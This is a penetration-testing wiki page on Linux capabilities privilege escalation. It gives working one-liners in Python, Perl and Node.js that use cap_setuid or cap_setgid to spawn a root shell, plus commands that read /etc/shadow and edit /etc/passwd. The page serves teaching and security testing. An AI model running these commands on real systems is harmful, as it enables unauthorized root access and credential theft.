Capabilities Abuse

Linux capabilities provide a more fine-grained access control system than the traditional Linux permissions model. They allow specific privileges to be granted to processes without giving them full root access.

Finding Files with Capabilities

# List all files with capabilities set on the system
getcap -r / 2>/dev/null

Common Dangerous Capabilities

CAP_SETUID

The CAP_SETUID capability allows a process to set user IDs, including setting the effective user ID to root.

Example of exploitation with Python:

# If Python has cap_setuid capability
getcap -r / 2>/dev/null | grep python
# Example output: /usr/bin/python3.7 = cap_setuid+ep

# Exploit to get a root shell
/usr/bin/python3.7 -c 'import os; os.setuid(0); os.system("/bin/bash")'

CAP_SETGID

Similar to CAP_SETUID, but for group IDs.

Example:

# If a binary has cap_setgid capability
getcap -r / 2>/dev/null | grep setgid
# Example output: /usr/bin/perl = cap_setgid+ep

# Exploit to get a shell with root group privileges
/usr/bin/perl -e 'use POSIX (setgid); setgid(0); exec "/bin/bash";'

CAP_DAC_READ_SEARCH

This capability allows bypassing file read permission checks and directory read/execute permission checks.

Example:

# If a binary has cap_dac_read_search
getcap -r / 2>/dev/null | grep dac_read_search
# Example output: /usr/bin/vim = cap_dac_read_search+ep

# Use to read sensitive files
/usr/bin/vim /etc/shadow

CAP_DAC_OVERRIDE

This capability bypasses file read, write, and execute permission checks.

Example:

# If a binary has cap_dac_override
getcap -r / 2>/dev/null | grep dac_override
# Example output: /usr/bin/nano = cap_dac_override+ep

# Use to write to protected files
/usr/bin/nano /etc/passwd

Exploitable Binaries with Capabilities

Python with cap_setuid

If Python has the cap_setuid capability, you can exploit it to get a root shell:

# Check if Python has the capability
getcap -r /usr/bin/python* 2>/dev/null

# If it does, use this to get a root shell
/usr/bin/python2.7 -c 'import os; os.setuid(0); os.system("/bin/bash")'

Perl with Capabilities

Perl with certain capabilities can also be exploited:

# Check if Perl has capabilities
getcap -r /usr/bin/perl* 2>/dev/null

# For cap_setuid+ep
/usr/bin/perl -e 'use POSIX (setuid); setuid(0); exec "/bin/bash";'

Node.js with Capabilities

Node.js can be exploited if it has capabilities:

# Check for Node.js with capabilities
getcap -r /usr/bin/node* 2>/dev/null

# For cap_setuid+ep
/usr/bin/node -e 'process.setuid(0); require("child_process").spawn("/bin/bash", {stdio: [0, 1, 2]});'

Other Languages and Binaries

Similar techniques can be used with other interpreted languages if they have capabilities set:

Ruby
PHP
Lua

Setting Capabilities (for Educational Purposes)

If you want to understand how capabilities are set:

# Setting a capability (requires root)
sudo setcap cap_setuid+ep /path/to/binary

Viewing Information About Capabilities

# View capabilities of current process
capsh --print

# List all capabilities
capsh --print | grep cap_

Capabilities During Penetration Testing

When performing penetration testing on a Linux system:

Always check for files with capabilities set
Focus on binaries with dangerous capabilities like setuid, setgid, and dac_override
Check interpreted language binaries especially (Python, Perl, Ruby, etc.)
Look for unusual or custom binaries with capabilities

Additional Resources

HackTricks - Linux Capabilities
Linux Capabilities Explained
GTFOBins - Check for capabilities section for each binary

PreviousEnvironment Variables Abuse NextPersistence

Last updated 6 months ago

hashtagFinding Files with Capabilities

hashtagCommon Dangerous Capabilities

hashtagCAP_SETUID

hashtagCAP_SETGID

hashtagCAP_DAC_READ_SEARCH

hashtagCAP_DAC_OVERRIDE

hashtagExploitable Binaries with Capabilities

hashtagPython with cap_setuid

hashtagPerl with Capabilities

hashtagNode.js with Capabilities

hashtagOther Languages and Binaries

hashtagSetting Capabilities (for Educational Purposes)

hashtagViewing Information About Capabilities

hashtagCapabilities During Penetration Testing

hashtagAdditional Resources

Finding Files with Capabilities

Common Dangerous Capabilities

CAP_SETUID

CAP_SETGID

CAP_DAC_READ_SEARCH

CAP_DAC_OVERRIDE

Exploitable Binaries with Capabilities

Python with cap_setuid

Perl with Capabilities

Node.js with Capabilities

Other Languages and Binaries

Setting Capabilities (for Educational Purposes)

Viewing Information About Capabilities

Capabilities During Penetration Testing

Additional Resources